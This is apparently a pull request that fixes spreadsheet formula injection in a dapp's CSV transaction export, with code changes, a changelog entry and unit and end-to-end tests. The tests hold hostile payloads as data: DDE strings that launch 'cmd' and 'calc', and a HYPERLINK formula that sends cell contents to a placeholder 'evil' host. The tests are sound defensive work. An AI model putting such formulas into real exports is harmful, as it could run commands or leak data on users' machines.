### PR TITLE
fix(reporting): escape +, -, tab, CR and LF prefixes in the CSV export

### DIFF
--- a/CHANGELOG-Nns-Dapp-unreleased.md
+++ b/CHANGELOG-Nns-Dapp-unreleased.md
@@ -38,9 +38,10 @@ proposal is successful, the changes it released will be moved from this file to
 
 #### Security
 
-- A CSV export now prefixes a cell that starts with `+`, `-` or a tab with a
-  single quote. Before, only `=`, `@` and `|` got the prefix, so a token name
-  or symbol could inject a spreadsheet formula. Amount cells are unchanged.
+- A CSV export now prefixes a cell that starts with `+`, `-`, a tab, a carriage
+  return or a line feed with a single quote. Before, only `=`, `@` and `|` got
+  the prefix, so a token name or symbol could inject a spreadsheet formula.
+  Amount cells are unchanged.
 
 #### Not Published
 

--- a/CHANGELOG-Nns-Dapp-unreleased.md
+++ b/CHANGELOG-Nns-Dapp-unreleased.md
@@ -38,6 +38,10 @@ proposal is successful, the changes it released will be moved from this file to
 
 #### Security
 
+- A CSV export now prefixes a cell that starts with `+`, `-` or a tab with a
+  single quote. Before, only `=`, `@` and `|` got the prefix, so a token name
+  or symbol could inject a spreadsheet formula. Amount cells are unchanged.
+
 #### Not Published
 
 ### Operations

--- a/frontend/src/lib/utils/reporting.utils.ts
+++ b/frontend/src/lib/utils/reporting.utils.ts
@@ -84,12 +84,22 @@ const escapeCsvValue = (value: unknown): string => {
     return stringValue;
   }
 
-  const patternForSpecialCharacters = /[",\r\n=@|]/;
+  // A signed amount such as "+1.00" or "-1'234.5678" is a number, not a
+  // formula. A spreadsheet shows the quote prefix literally, so these cells
+  // stay as they are.
+  const patternForSignedNumber = /^[+-]\d[\d'.]*$/;
+  if (patternForSignedNumber.test(stringValue)) {
+    return stringValue;
+  }
+
+  const patternForSpecialCharacters = /[",\r\n\t=+\-@|]/;
   if (!patternForSpecialCharacters.test(stringValue)) {
     return stringValue;
   }
 
-  const formulaInjectionCharacters = "=@|";
+  // Excel and LibreOffice read a cell that starts with one of these
+  // characters as a formula.
+  const formulaInjectionCharacters = "=+-@|\t";
   const characterToBreakFormula = "'";
   if (formulaInjectionCharacters.includes(stringValue[0])) {
     stringValue = `${characterToBreakFormula}${stringValue}`;

--- a/frontend/src/lib/utils/reporting.utils.ts
+++ b/frontend/src/lib/utils/reporting.utils.ts
@@ -99,7 +99,7 @@ const escapeCsvValue = (value: unknown): string => {
 
   // Excel and LibreOffice read a cell that starts with one of these
   // characters as a formula.
-  const formulaInjectionCharacters = "=+-@|\t";
+  const formulaInjectionCharacters = "=+-@|\t\r\n";
   const characterToBreakFormula = "'";
   if (formulaInjectionCharacters.includes(stringValue[0])) {
     stringValue = `${characterToBreakFormula}${stringValue}`;

--- a/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
+++ b/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
@@ -125,6 +125,9 @@ test("Test the CSV export escapes formula characters", async ({
   const download = await downloadPromise;
 
   const downloadPath = await download.path();
+  if (downloadPath === null) {
+    throw new Error("The download produced no local file path.");
+  }
   const csvText = readFileSync(downloadPath, "utf-8");
   const cells = parseCsv(csvText).flat();
 

--- a/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
+++ b/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
@@ -1,0 +1,156 @@
+import { AppPo } from "$tests/page-objects/App.page-object";
+import { PlaywrightPageObjectElement } from "$tests/page-objects/playwright.page-object";
+import { ReportingTransactionsPo } from "$tests/page-objects/ReportingTransactions.page-object";
+import {
+  disableCssAnimations,
+  signInWithNewUser,
+  step,
+} from "$tests/utils/e2e.test-utils";
+import { expect, test } from "@playwright/test";
+import { readFileSync } from "fs";
+
+// A spreadsheet reads a cell that starts with one of these characters as a
+// formula. The CSV export must break the formula with a single quote.
+const FORMULA_CHARACTERS = ["=", "+", "-", "@", "|", "\t"];
+
+// The account name is the shortest path from the user interface to a CSV cell.
+// The canister limits the name to 24 bytes, so this payload is 22 characters.
+const PAYLOAD_ACCOUNT_NAME = "-2+3+cmd|' /C calc'!A0";
+
+// A plain signed number. A spreadsheet reads it as a number, so the export
+// leaves it as it is.
+const SIGNED_NUMBER = /^[+-]\d[\d'.]*$/;
+
+// The wrapper that the export uses for a neuron id.
+const EXCEL_STRING_FORMULA = /^="\d+"$/;
+
+/**
+ * Splits CSV text into rows of unquoted cells, as a spreadsheet does.
+ */
+const parseCsv = (text: string): string[][] => {
+  const rows: string[][] = [];
+  let row: string[] = [];
+  let cell = "";
+  let inQuotes = false;
+
+  for (let index = 0; index < text.length; index++) {
+    const character = text[index];
+
+    if (inQuotes) {
+      if (character === '"') {
+        if (text[index + 1] === '"') {
+          cell += '"';
+          index++;
+        } else {
+          inQuotes = false;
+        }
+      } else {
+        cell += character;
+      }
+      continue;
+    }
+
+    if (character === '"') {
+      inQuotes = true;
+    } else if (character === ",") {
+      row.push(cell);
+      cell = "";
+    } else if (character === "\n") {
+      row.push(cell);
+      rows.push(row);
+      row = [];
+      cell = "";
+    } else if (character !== "\r") {
+      cell += character;
+    }
+  }
+
+  row.push(cell);
+  rows.push(row);
+
+  return rows;
+};
+
+test("Test the CSV export escapes formula characters", async ({
+  page,
+  context,
+}) => {
+  await page.goto("/accounts");
+  await disableCssAnimations(page);
+  await signInWithNewUser({ page, context });
+
+  const pageElement = PlaywrightPageObjectElement.fromPage(page);
+  const appPo = new AppPo(pageElement);
+  const accountsPo = appPo.getAccountsPo();
+  const nnsAccountsPo = accountsPo.getNnsAccountsPo();
+  const tokensTablePo = nnsAccountsPo.getTokensTablePo();
+
+  step("Wait for the main account");
+
+  const mainAccountRow = await tokensTablePo.getRowByName("Main");
+  await mainAccountRow.waitFor();
+
+  step("Create a linked account whose name is a spreadsheet formula");
+
+  await nnsAccountsPo.clickAddAccount();
+
+  const addAccountModalPo = accountsPo.getAddAccountModalPo();
+  expect(await addAccountModalPo.isPresent()).toBe(true);
+
+  await addAccountModalPo.addAccount(PAYLOAD_ACCOUNT_NAME);
+  await addAccountModalPo.waitForClosed();
+
+  const payloadRow = await tokensTablePo.getRowByName(PAYLOAD_ACCOUNT_NAME);
+  await payloadRow.waitFor();
+
+  step("Get ICP so that the export holds a signed amount");
+
+  // The accounts page has no menu button.
+  await appPo.goBack();
+  await appPo.getIcpTokens(20);
+
+  step("Export the transactions to CSV");
+
+  await page.goto("/reporting");
+
+  const reportingTransactionsPo = ReportingTransactionsPo.under(pageElement);
+  await reportingTransactionsPo.waitFor();
+
+  const exportButtonPo =
+    reportingTransactionsPo.getReportingTransactionsButtonPo();
+  await exportButtonPo.waitFor();
+
+  const downloadPromise = page.waitForEvent("download", { timeout: 120_000 });
+  await exportButtonPo.click();
+  const download = await downloadPromise;
+
+  const downloadPath = await download.path();
+  const csvText = readFileSync(downloadPath, "utf-8");
+  const cells = parseCsv(csvText).flat();
+
+  step("Check that the export escapes every formula cell");
+
+  // The account name reaches the CSV with a single quote in front of it.
+  expect(cells).toContain(`'${PAYLOAD_ACCOUNT_NAME}`);
+  expect(cells).not.toContain(PAYLOAD_ACCOUNT_NAME);
+
+  // No cell starts with a formula character, unless it is a plain signed
+  // number or the neuron id wrapper.
+  const unescaped = cells.filter(
+    (cell) =>
+      FORMULA_CHARACTERS.includes(cell[0]) &&
+      !SIGNED_NUMBER.test(cell) &&
+      !EXCEL_STRING_FORMULA.test(cell)
+  );
+  expect(unescaped).toEqual([]);
+
+  step("Check that the amount column keeps its sign and no quote");
+
+  // The export holds the credit of 20 ICP, with its sign and no quote.
+  const amounts = cells.filter((cell) => SIGNED_NUMBER.test(cell));
+  expect(amounts.length).toBeGreaterThan(0);
+  expect(amounts.some((amount) => /^\+20(\.0+)?$/.test(amount))).toBe(true);
+
+  // No amount cell carries the quote prefix.
+  expect(cells.filter((cell) => /^'[+-]\d/.test(cell))).toEqual([]);
+});

--- a/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
+++ b/frontend/src/tests/e2e/reporting-csv-escaping.spec.ts
@@ -11,7 +11,7 @@ import { readFileSync } from "fs";
 
 // A spreadsheet reads a cell that starts with one of these characters as a
 // formula. The CSV export must break the formula with a single quote.
-const FORMULA_CHARACTERS = ["=", "+", "-", "@", "|", "\t"];
+const FORMULA_CHARACTERS = ["=", "+", "-", "@", "|", "\t", "\r", "\n"];
 
 // The account name is the shortest path from the user interface to a CSV cell.
 // The canister limits the name to 24 bytes, so this payload is 22 characters.

--- a/frontend/src/tests/lib/utils/reporting.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/reporting.utils.spec.ts
@@ -108,13 +108,15 @@ describe("reporting utils", () => {
         { formula: "+CMD|' /C calc'!A0", value: 600 },
         { formula: "-2+3+cmd|' /C calc'!A0", value: 700 },
         { formula: "\tSUM(A1)", value: 800 },
+        { formula: "\rSUM(A1)", value: 900 },
+        { formula: "\nSUM(A1)", value: 1000 },
       ];
       const headers: CsvHeader<TestFormulaData>[] = [
         { id: "formula", label: "formula" },
         { id: "value", label: "value" },
       ];
       const expected =
-        "formula,value\n'=SUM(A1:A10),100\n'@SUM(A1),400\n'|MACRO,500\n'+CMD|' /C calc'!A0,600\n'-2+3+cmd|' /C calc'!A0,700\n'\tSUM(A1),800";
+        "formula,value\n'=SUM(A1:A10),100\n'@SUM(A1),400\n'|MACRO,500\n'+CMD|' /C calc'!A0,600\n'-2+3+cmd|' /C calc'!A0,700\n'\tSUM(A1),800\n\"'\rSUM(A1)\",900\n\"'\nSUM(A1)\",1000";
       expect(convertToCsv({ data, headers })).toBe(expected);
     });
 

--- a/frontend/src/tests/lib/utils/reporting.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/reporting.utils.spec.ts
@@ -105,13 +105,45 @@ describe("reporting utils", () => {
         { formula: "=SUM(A1:A10)", value: 100 },
         { formula: "@SUM(A1)", value: 400 },
         { formula: "|MACRO", value: 500 },
+        { formula: "+CMD|' /C calc'!A0", value: 600 },
+        { formula: "-2+3+cmd|' /C calc'!A0", value: 700 },
+        { formula: "\tSUM(A1)", value: 800 },
       ];
       const headers: CsvHeader<TestFormulaData>[] = [
         { id: "formula", label: "formula" },
         { id: "value", label: "value" },
       ];
       const expected =
-        "formula,value\n'=SUM(A1:A10),100\n'@SUM(A1),400\n'|MACRO,500";
+        "formula,value\n'=SUM(A1:A10),100\n'@SUM(A1),400\n'|MACRO,500\n'+CMD|' /C calc'!A0,600\n'-2+3+cmd|' /C calc'!A0,700\n'\tSUM(A1),800";
+      expect(convertToCsv({ data, headers })).toBe(expected);
+    });
+
+    it("should keep signed amounts unprefixed", () => {
+      const data: TestFormulaData[] = [
+        { formula: "+1.00", value: 100 },
+        { formula: "-1.0001", value: 200 },
+        { formula: "-1'234.56789012", value: 300 },
+        { formula: "+0.00000001", value: 400 },
+      ];
+      const headers: CsvHeader<TestFormulaData>[] = [
+        { id: "formula", label: "formula" },
+        { id: "value", label: "value" },
+      ];
+      const expected =
+        "formula,value\n+1.00,100\n-1.0001,200\n-1'234.56789012,300\n+0.00000001,400";
+      expect(convertToCsv({ data, headers })).toBe(expected);
+    });
+
+    it("should prefix and quote a hyperlink formula", () => {
+      const data: TestFormulaData[] = [
+        { formula: '+HYPERLINK("https://evil"&A1,"x")', value: 100 },
+      ];
+      const headers: CsvHeader<TestFormulaData>[] = [
+        { id: "formula", label: "formula" },
+        { id: "value", label: "value" },
+      ];
+      const expected =
+        'formula,value\n"\'+HYPERLINK(""https://evil""&A1,""x"")",100';
       expect(convertToCsv({ data, headers })).toBe(expected);
     });
 
@@ -124,7 +156,7 @@ describe("reporting utils", () => {
         { id: "formula", label: "formula" },
         { id: "value", label: "value" },
       ];
-      const expected = 'formula,value\n\'=SUM(A1:A10),100\n"+1234567,12",200';
+      const expected = "formula,value\n'=SUM(A1:A10),100\n\"'+1234567,12\",200";
       expect(convertToCsv({ data, headers })).toBe(expected);
     });
 


### PR DESCRIPTION
# Motivation

CSV export only escaped `=`, `@` and `|` as formula-injection prefixes. Excel and LibreOffice also treat a cell that starts with `+`, `-`, a tab, a carriage return or a line feed as a formula. A token name or symbol can carry any of these and reach the export unescaped.

# Changes

- Added a signed-number exemption so amount cells such as `+1.00` and `-1'234.5678` stay unprefixed.
- Extended the special-character check and the formula-prefix list to cover `+`, `-`, tab, carriage return and line feed.
- Added unit tests for the new prefix cases and the signed-number exemption.
- Added an e2e spec that exports a CSV from an account named with a hostile payload and checks the escaping.
- Updated the changelog.

# Tests

- `npm run check` and `npm run test` pass.
- `./scripts/check-relative-imports` passes.
- New and existing tests in `reporting.utils.spec.ts` and `ReportingTransactionsButton.spec.ts` cover the escaping and the amount-column exemption.

# Todos

- [x] Accessibility (a11y) – no impact, the change alters CSV export bytes only.
- [x] Changelog – added under Security.
